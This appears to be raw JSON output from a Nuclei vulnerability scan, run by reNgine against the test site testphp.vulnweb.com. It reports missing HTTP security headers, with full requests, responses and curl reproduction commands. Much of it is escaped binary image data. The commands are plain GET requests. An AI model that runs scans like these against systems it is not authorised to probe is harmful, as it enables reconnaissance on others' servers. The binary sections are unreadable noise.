pO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\u0003\\u0018\\ufffdn#B\\u0019J\\ufffd\\u003c\\ufffd\\u001e\\ufffd\\ufffd]F\\ufffd\\ufffd/\\ufffd'zQ\\ufffd\\ufffdd\\ufffd0\\\\}\\ufffdy\\u001b|ou4H\\u0013\\ufffd\\ufffdY\\ufffdg#\\ufffd\\ufffd3\\\\\\ufffd\\ufffd$\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\\"G\\ufffdZ\\ufffd\\ufffd1\\ufffdy\\ufffd\\u00267\\ufffd\\ufffd\\ufffd3\\ufffd\\u0000\\ufffd}\\ufffd\\ufffd.\\ufffd\\ufffd\\ufffdNH\\ufffd\\ufffd0\\ufffd\\r\\ufffdg\\t\\ufffdL\\u0012\\u0000\\ufffd\\ufffd\\ufffdX\\u000f\\ufffd\\u001e\\u001f\\ufffd\\ufffd\\ufffdؠ\\ufffd\\ufffd\\u001e\\ufffd\\u000c\\ufffdu\\ufffd\\ufffdp\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\u0014\\ufffd\\\\\\ufffd\\ufffd\\u0007\\u0007\\u0018=N\\ufffd\\ufffd#\\ufffd\\ufffdE\\ufffd\\ufffd/)\\ufffd\\ufffd\\ufffd7\\ufffd{\\u000c.N \\ufffdJԬ\\ufffd\\ufffdo\\ufffd,\\ufffd#1\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-zj\\ufffdtr\\ufffd*\\ufffdA\\\"\\ufffd\\ufffd\\ufffda\\u0013\\ufffd\\\"\\ufffd\\u000e\\u000b\\u0000\\t\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd@\\nR\\ufffd\\u0000\\ufffd)@\\nݽ\\u0019\\ufffd\\u000e\\ufffd\\ufffdtJi7\\ufffd;\\u000f\\ufffd\\u0008\\u001d\\u0004W6Q\\ufffd^bn\\u001b\\ufffd\\ufffdr\\ufffd\\u0000\\u0001݇\\u000cG\\ufffdq\\ufffd\\ufffd*U}N\\ufffd\\ufffdTT-YI\\ufffdt\\u0026\\ufffd\\ufffd\\u0013\\ufffdn\\ufffd\\ufffd\\ufffd7\\ufffdtKy\\ufffdn-\\ufffd%x\\u0004\\ufffd\\u0008Ϩ\\u000c.C\\u0002\\u0000ʳ\\u0005$pH8\\ufffd\\u0008[\\ufffd\\ufffd\\\"]\\ufffd-\\ufffd\\ufffd\\ufffd,\\ufffdr-\\\\\\u0004i\\ufffd\\ufffd#.Oel\\u0010\\u001b\\ufffd;O#\\u0019\\ufffdO\\n\\ufffd@\\ufffd\\ufffd}n9\\ufffd.\\ufffd\\u000f i\\ufffd\\u0007\\ufffd\\ufffdo\\ufffd\\u0003\\ufffd\\nϺ\\ufffd\\ufffd[\\ufffdg\\ufffd4\\ufffdm\\u003c\\ufffd:\\ufffd\\ufffdY\\ufffd\\ufffd+mf\\ufffd\\ufffd\\ufffdn\\ufffd\\u0015\\ufffdM\\ufffd\\ufffdFw\\ufffd\\ufffd\\u0007z\\ufffd_\\ufffdŰԿq\\ufffd1\\ufffd\\ufffd\\u001f,y-\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd}2\\ufffd\\u0005 x\\ufffdQ\\u003cBkq'\\u000f\\ufffd\\u0003r\\ufffd\\ufffd\\ufffdI\\u0003\\u001f\\u0004|\\u001a\\ufffd%\\ufffdb΀\\ufffd\\u0007'\\ufffd\\ufffd.\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdݕ\\ufffd\\ufffd\\ufffd\\ufffd\\u0015i!\\ufffd+\\ufffd1\\ufffd\\u0001\\u000e\\ufffd%\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\ufffdF+=\\ufffdb\\ufffd\\ufffd1ナ\\ufffdYMt݋\\ufffd\\ufffdș\\ufffd\\u0019Dt\\ufffd\\ufffd\\u0014\\\\\\ufffd\\u000e_fcRC}x\\ufffd\\u000fDZ\\ufffd\\u003e\\ufffd\\rݵմ\\ufffdkr\\ufffd\\u0016\\ufffd\\ufffd\\u0000ψ\\ufffd\\ufffd^0Ɂ\\ufffd\\\\\\u0013\\ufffd\\u00169\\u003c\\ufffd\\u0001W8\\ufffdY\\ufffdz\\u0015\\u003c\\ufffd;Np\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\u0003\\ufffd\\u0004\\u000eǸ\\ufffd\\ufffdДc?W\\u0001\\ufffd\\ufffd\\\"\\ufffd\\\\%\\ufffd@\\ufffd\\ufffd'\\u0001\\ufffd\\ufffdʺ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffd\\u0000\\u001a\\ufffdP\\ufffd\\ufffd7\\ufffd\\ufffd\\u001f\\ufffd \\ufffdK;\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0006\\t\\\\z\\ufffd\\u0017\\ufffd\\u0005\\ufffd\\ufffd0\\ufffd\\ufffdrx\\u0018\\u0019\\ufffdn)\\ufffdM\\ufffd\\ufffd_\\ufffdG\\\"5\\ufffdI%\\ufffd\\ufffd\\t\\u0002V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqT\\ufffd\\ufffd/,\\u000e\\ufffd\\u0019]C\\ufffd\\u0003\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0003R\\ufffd\\ufffd\\ufffda\\u0001\\u0016\\ufffd\\u0014h\\ufffdE\\ufffd\\ufffd1\\u0004\\ufffdp\\u000f\\u001f8\\ufffd\\ufffdQU\\\\\\ufffd\\ufffd\\u0016^E\\ufffd74w\\ufffd\\ufffd\\u0010\\ufffdp\\ufffdsG\\ufffdb\\ufffd\\u0015\\u0001fE?˺\\u0000\\u0000\\ufffd\\ufffd\\ufffdl\\u0000\\u0003\\u001e;\\u0006\\ufffd\\ufffd.\\u0003ᯄ6\\ufffd\\u00163[u\\ufffd\\ufffdMQ\\ufffd%b\\ufffd\\ufffdhT*\\ufffd0R;\\ufffd'\\ufffd\\ufffd\\\\`溺\\ufffd\\u0000$\\ufffd\\ufffd\\u003c\\ufffd(0\\ufffd\\u0018\\ufffd\\u0000|`\\ufffd\\ufffdU\\ufffdP\\ufffd\\ufffd]ķ\\ufffd!\\ufffdB\\ufffd\\u003e0T\\ufffda\\t\\ufffd\\ufffd\\u0019\\u001e\\ufffd\\u0000\\u0011\\ufffdgAG]\\ufffdQ\\ufffd\\ufffdf\\ufffd\\ufffd\\ufffd\\u0000RǏ\\ufffd\\ufffd\\\"\\ufffd\\u001c\\ufffd\\ufffd5~\\ufffd\\ufffdt\\ufffd\\ufffdM\\ufffd6\\ufffd\\ufffd$p\\ufffd\\ufffdI\\ufffd\\ufffd+\\ufffdm\\ufffd\\u000c\\u0002{\\ufffdx\\ufffd\\ufffd9\\u000bZ\\ufffd.\\ufffdmR\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003c\\u0010\\u000e\\u0008\\ufffd}\\rz;\\u000cP\\ufffd\\u001cN\\ufffddP7F㜃\\ufffd\\ufffdpG\\ufffd\\ufffd\\\\\\ufffd\\ufffd'|5\\ufffdL\\u000f\\ufffdZ4\\u0011\\ufffd\\ufffd)k\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd#.J\\ufffdz\\u0007$\\ufffd=9\\ufffd8\\u0002\\ufffd~\\ufffdu\\ufffd\\ufffdt^\\ufffd\\ufffd\\u001f_\\ufffd3Q\\u00055\\ufffd\\ufffd\\ufffd\\\\\\ufffd)[€\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\u001d5\\ufffd7\\ufffdK'H\\ufffd\\u001a\\ufffd\\ufffd\\ufffd}.O9\\u001eFr\\u0004\\u001d\\ufffd*\\ufffd\\u000b(\\ufffd\\r\\ufffd\\ufffdv\\u001c1\\u003co\\ufffd\\ufffdEK[\\ufffd\\ufffd\\ufffd\\ufffd1R$i\\u000b\\u0015\\ufffdc@\\ufffd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\n\\ufffd\\ufffd@\\ufffdnt]R\\u001b\\ufffd6ı\\ufffd\\ufffḑ\\ufffdS\\ufffd\\ufffdEu\\ufffd\\ufffd\\ufffd\\ufffd%\\ufffd\\ufffdq̗\\ufffd\\ufffdл\\u001c\\u0003\\ufffd$\\ufffd\\u0019\\ufffd\\ufffd)\\ufffd\\ufffd\\u000c\\ufffd\\rb\\ufffd\\ufffd\\ufffd**WU\\ufffd\\ufffd\\ufffdOgz\\ufffdf\\ufffdԄ\\ufffd\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd-\\u003c *\\ufffd\\ufffd\\u0000d1\\ufffd\\ufffd\\u0014c\\u003c\\u001f\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffdIm$\\ufffd\\ufffd:\\u000f0\\u0014V_Ab\\u0007\\ufffd\\ufffd\\u0004\\u0015*W$\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd;M\\u0006\\ufffdSYLRYrʌ]\\ufffd\\ufffd\\u0014\\u000e\\u0007\\ufffd\\ufffd\\u00198\\ufffd\\t\\ufffdlU\\ufffdÿ\\u0013\\ufffd\\ufffd\\ufffdd\\ufffd\\u0013ej\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\u0000\\u0018e*\\ufffd6{z\\u0018}\\ufffd\\u000e\\u001d\\u001d3U\\n%j_-\\ufffd\\ufffd\\u0000G\\ufffd4\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdbIc\\ufffdf\\u0001ܣ%\\u001aA\\ufffd'\\ufffdRN\\u0014\\n\\ufffdb\\u003eߤ\\ufffd\\ufffd\\ufffd\\u003eZ2\\ufffdg\\u0008\\ufffd\\ufffdr\\ufffd\\ufffdr\\n\\ufffd#\\ufffd\\ufffd\\ufffd-N\\ufffd\\ufffd\\ufffd\\t\\ufffdl\\ufffd2\\ufffdBF\\u000f\\ufffd\\u0011\\ufffdE}i\\ufffd\\ufffd'\\ufffd\\ufffdܬ2yh\\ufffd\\ufffdlM\\ufffd\\ufffd\\ufffd\\ufffd@?\\ufffd\\u000f\\u001d\\ufffd\\ufffd)O\\ufffd\\u0012\\ufffd\\\"4\\ufffd\\ufffd\\u0017\\u000b4A\\ufffdӆ(\\ufffdN@e$0\\u0007\\u0003 \\u0010Goj4\\ufffd\\u0000b\\ufffd\\ufffdW\\u0002\\t1\\ufffdg\\u003cq\\ufffd\\ufffd?\\u000b\\ufffd1\\ufffd\\ufffd\\ufffdN\\u0013\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd8\\u000e\\ufffd\\ufffd1\\u001a\\ufffd\\u0007\\ufffdrs\\ufffd\\ufffd\\u0000J\\ufffd4{\\ufffd{eNy\\ufffd\\ufffd\\u0000l\\ufffd\\ufffd\\ufffdN\\ufffd'\\r\\ufffd\\ufffdڟ%\\ufffd\\ufffd9?\\ufffd\\\\H\\ufffd\\ufffd樑d\\u000e\\ufffdy\\ufffdvc\\u0018\\ufffdl\\u001eC\\u000c\\ufffd\\ufffdc?\\ufffd\\ufffdu\\u0017\\ufffd:\\ufffd\\u0018\\u0015 \\ufffd\\ufffd\\ufffd9\\u0007\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffdh\\ufffdf\\ufffd\\ufffdN\\ufffd? g\\ufffd##\\u003e٩v\\ufffd)q\\n\\ufffd\\u0013\\u0006\\u000c\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd9+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffdأ%\\ufffd\\ufffd}\\ufffd\\u0018\\u0000x݁uw\\u003cr2\\ufffdy\\ufffd\\u0019\\ufffd܏bI0z\\ufffdN\\ufffdR\\ufffd\\ufffd\\ufffdh\\ufffd{gc\\ufffdG*\\ufffd\\ufffd\\ufffdF\\u0018!\\ufffd\\u000er;\\u000c\\ufffd\\ufffdo\\ufffd!\\ufffdX\\ufffd\\ufffd\\ufffdv\\ufffd\\u0000\\ufffd\\u0003\\u0003;\\ufffd d\\ufffd\\u0000H'\\u0007\\ufffd\\ufffdy\\u0014Yb\\ufffd\\ufffd\\ufffd\\ufffd/\\u001f\\ufffd\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffdBj:O^\\ufffd\\ufffd\\ufffd\\ufffdks~\\ufffd\\ufffde\\ufffd\\ufffd\\u000b\\ufffd\\ufffd\\u000c7#\\ufffd\\u0001\\ufffdOr\\u0006\\u0001\\u000c=\\ufffd\\ufffdֽ\\u0019\\ufffd\\ufffdeݬ\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdȌ\\u001d\\u001cP\\u000c?\\ufffdO\\u0004w\\u0007\\ufffdA=ܶV\\ufffdk\\ufffd$\\ufffd \\ufffd\\ufffd\\ufffdCi+\\u0016$$\\ufffd\\u0017\\ufffd9\\u003e\\ufffd\\u0019\\u001c\\u000c2ջ\\ufffd.\\ufffd\\ufffd\\ufffdΓ\\ufffdѵ+cotS̷\\ufffd\\u001b\\\\E0\\ufffd\\n\\ufffd3\\ufffd0r\\u0001*\\ufffd\\ufffd\\ufffd6\\ufffdj\\ufffd\\ufffd\\\\m\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^zd\\ufffd\\ufffd\\ufffd\\ufffdVs\\ufffdx[\\ufffd\\ufffde\\ufffd\\ufffduu\\ufffdI\\ufffdm8o\\ufffdt\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\t\\ufffd̀\\u001eX\\u000c.\\u0018\\u001c\\u0015l`ղ\\ufffd\\ufffd\\ufffdY\\ufffdI\\ufffd\\n\\ufffd.\\u003c\\ufffdR\\ufffd \\ufffd\\ufffd\\ufffd\\u0000+$鞮\\ufffdzz\\ufffdh\\ufffdXs\\ufffdE\\ufffd\\ufffdS\\u00122G\\u003e\\ufffdc\\ufffd\\ufffdt\\ufffd\\ufffd\\u0011\\ufffdĖP\\ufffd\\ufffd\\ufffd\\u0026˩\\ufffdM\\u0014\\ufffd\\ufffdw\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,\\t\\ufffd\\u003e\\ufffd\\u0000P)\\ufffdj7:N\\ufffd\\r唅'\\ufffd\\ufffd\\u0003\\ufffd~\\ufffd\\ufffdj\\u0015)ZMa\\ufffd\\ufffd:\\ufffd\\ufffdz\\ufffd\\u0014\\ufffdi.\\r\\ufffd0\\ufffd\\ufffdb\\ufffd6\\ufffd.~\\ufffd\\u0012I\\ufffd\\ufffdϾs\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdV\\r\\ufffd\\ufffd\\ufffd˒\\ufffd\\u0016%s\\ufffd\\u003c\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffd\\\\\\ufffdG\\ufffd7NH\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffd\\u003cՌ\\u003eF@,\\ufffdw\\u0003\\ufffds\\ufffd9\\\"\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=jd\\u0026W\\ufffd\\ufffdԏ1\\ufffdm\\ufffd\\ufffdڟ@\\ufffd\\ufffdܱ\\ufffd\\ufffd\\u0005\\ufffd4\\ufffd\\ufffdl\\ufffdQ\\ufffdK)\\ufffd|c\\ufffd:TNV\\ufffd\\u0026f)\\u0000:\\ufffd\\ufffd\\u000c9\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000f|\\ufffd\\ufffdH\\ufffd\\ufffdKx\\ufffd9\\ufffdYa\\ufffd\\u000c\\ufffdT\\ufffd\\ufffd.J\\ufffd\\ufffd]\\ufffd%\\ufffdw\\ufffd|\\ufffd\\u00260\\ufffdw\\u0003\\ufffd\\u000foҲ\\ufffd\\u000eܢ\\ufffdc\\ufffda\\ufffd\\\\SP\\ufffd\\ufffd\\u0011$2\\ufffd\\ufffd7\\u001b\\ufffd\\ufffd|~+\\u001b\\ufffd\\ufffd[[\\ufffd\\ufffd\\ufffd\\ufffd0$\\ufffdô\\u0010s\\ufffd~y\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-/\\ufffd\\ufffd_4D\\ufffdޑ\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd@\\u001f#\\ufffd\\ufffdS5m@\\\\\\ufffd\\u001e\\ufffd0ϸ\\ufffd2\\ufffd\\ufffd($\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffdN\\u001a\\u0019S-\\ufffdc\\ufffd\\ufffd62\\ufffd5\\ufffdV\\ufffdt\\ufffd\\ufffd\\ufffdVR\\ufffd\\u0019\\ufffd~\\ufffdF\\u0008 \\ufffd`\\ufffdԻ=v\\ufffd\\ufffd\\ufffdV2\\u003c\\ufffd\\u0002\\ufffdbA\\ufffd\\ufffd\\u00001' \\ufffd\\u00003ܑ\\ufffdyƓ\\ufffd\\ufffdR\\ufffdU\\ufffd\\u001d\\ufffd\\ufffd\\u0018\\ufffdE\\ufffd\\ufffd9ܟ\\ufffd\\u0003۱\\ufffd\\ufffd\\ufffd\\ufffdT=T\\ufffdƭ\\ufffd\\ufffdRyU7\\ufffd*\\ufffd\\ufffd\\tu\\u0005\\ufffdG\\u0003qQ\\ufffd\\ufffd\\ufffdƬˢO\\ufffde\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\ufffdQ\\ufffd:\\ufffd\\ufffd5\\ufffds\\ufffdF\\ufffdl\\ufffd\\u0008#\\ufffd\\u000fЃ\\ufffd\\ufffd\\ufffd\\ufffdZMom\\ufffd\\ufffds2\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd`\\u001229\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd{v\\ufffd\\u001c\\ufffd\\ufffdV\\ufffd\\u0018u#\\ufffd\\ufffd@\\ufffd\\ufffd\\\\\\ufffd\\ufffd_X\\ufffd\\ufffdRА;\\\\+\\ufffdY\\ufffd}\\u0003\\ufffd\\ufffd\\u001c\\ufffd\\ufffd+\\ufffd\\ufffd*N\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd?an\\ufffdW\\u0013lx\\ufffd\\ufffd/\\ufffd\\ufffd\\u0017\\ufffd\\ufffd\\ufffdt\\ufffdwD4N\\ufffd\\ufffdI\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\u001d\\ufffd@? v\\ufffd\\ufffd\\ufffdr9\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdו\\ufffd\\ufffd\\ufffd7%\\ufffd9\\ufffd\\ufffd5N\\ufffd=?\\ufffdס\\ufffd\\ufffd~Ne\\ufffd\\ufffd\\u001eX\\ufffd)Wȅ)J\\u0000R\\ufffd\\ufffd\\u0005)J\\u0000\\ufffd\\ufffd^ɧjVװ\\ufffd2[Ȳ\\ufffde\\u000c\\t\\u00078 \\ufffd\\u0008\\ufffd\\u0011\\ufffd\\ufffd۾\\ufffd\\ufffdP\\ufffdM\\ufffdFb\\ufffdH\\ufffd\\ufffd\\u000b\\ufffd\\\\+/\\u0003\\ufffd\\u000e\\t\\ufffd\\u0013\\ufffd\\ufffd\\ufffdj\\ufffdtް\\ufffd,\\ufffd\\ufffdk\\u0015t{kv-\\u0018 \\ufffd\\\\\\ufffd\\u0006\\ufffd\\u0012H\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\u0004un2\\ufffd\\ufffd\\ufffdznu\\ufffd\\ufffd}#]\\u000f:\\ufffd\\ufffd=9a\\ufffd~ď\\ufffd\\u001a\\ufffd\\ufffdj\\ufffdV\\ufffd\\ufffd\\ufffdʪ\\u00103\\ufffd\\ufffd\\u0006I\\u001e\\ufffd\\ufffd{r\\u0007\\u0015\\ufffd4\\u001dXKio{lΚh\\ufffd\\ufffd)%\\u001e\\ufffd\\u0018\\ufffd\\ufffd\\u001d\\ufffd\\u001c\\u0015\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\u001da\\u0016\\ufffdu\\u0004s\\ufffdC\\u0018\\u000b$C'w\\ufffd\\u0004\\ufffd\\ufffdn\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014]\\ufffd\\ufffdG,\\ufffdu7_ZOc\\u0006\\ufffd\\u0010H\\ufffdl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd s\\ufffd\\ufffd\\u001fp\\u0006@'\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdK4\\u0010\\ufffd{\\u0015IJ@]\\ufffd\\u0016\\u0000m\\ny\\ufffd8\\u0018\\ufffd\\ufffd\\ufffd\\u001a\\ufffdɼ\\ufffd.n\\ufffd\\ufffd3J\\ufffd\\u0015\\ufffd\\ufffdI\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd#\\ufffdԸ\\ufffdり\\ufffdY\\ufffdz\\ufffd\\u000b\\ufffd\\ufffd\\ufffd}F\\ufffd\\u0012\\u001a7\\ufffd\\ufffdubC\\ufffd\\ufffd\\ufffd\\ufffdx8\\ufffd\\ufffd8\\ufffdZ.\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u001fO\\ufffdI\\u000c\\ufffd\\ufffdF\\ufffd\\ufffd \\ufffd#\\ufffd\\u0013\\ufffdV\\ufffdU\\ufffd\\u0008\\ufffd\\ufffdcn\\u0008\\ufffd\\ufffd\\ufffdrX\\ufffd\\ufffde\\ufffd\\ufffd|\\ufffd=\\ufffd\\ufffdA\\ufffd(PB\\ufffd\\ufffdm\\\\\\u001eG\\n\\ufffd\\ufffd\\ufffd'\\u0000V\\ufffd\\ufffd\\rA\\ufffdMf\\ufffd\\ufffd\\ufffdw\\ufffd!*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdQU\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\u0007J\\ufffdK\\ufffdJR\\ufffd\\u0018)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0006ᖳq\\ufffd\\ufffd]?%\\ufffd\\ry\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd\\u0008\\ufffd;f\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\ufffdۉ\\ufffd\\n\\ufffdY\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdX\\ufffdQ\\ufffdN\\u0000\\ufffd$\\ufffd\\ufffdiJ\\ufffd\\u0018\\ufffds\\ufffd\\ufffdHߤ\\ufffdҔ\\ufffd$b\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:30.996660279Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests\",\"path\":\"/wvstests\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/\",\"request\":\"GET /wvstests HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:27 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"pmwiki_2_1_19/\\\"\\u003epmwiki_2_1_19/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:31.542161313Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"path\":\"/pictures/4.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"request\":\"GET /pictures/4.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4615\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:58 GMT\\r\\nEtag: \\\"4dca64a1-1207\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0000\\u0003\\u0006\\u0002\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u00005\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0002\\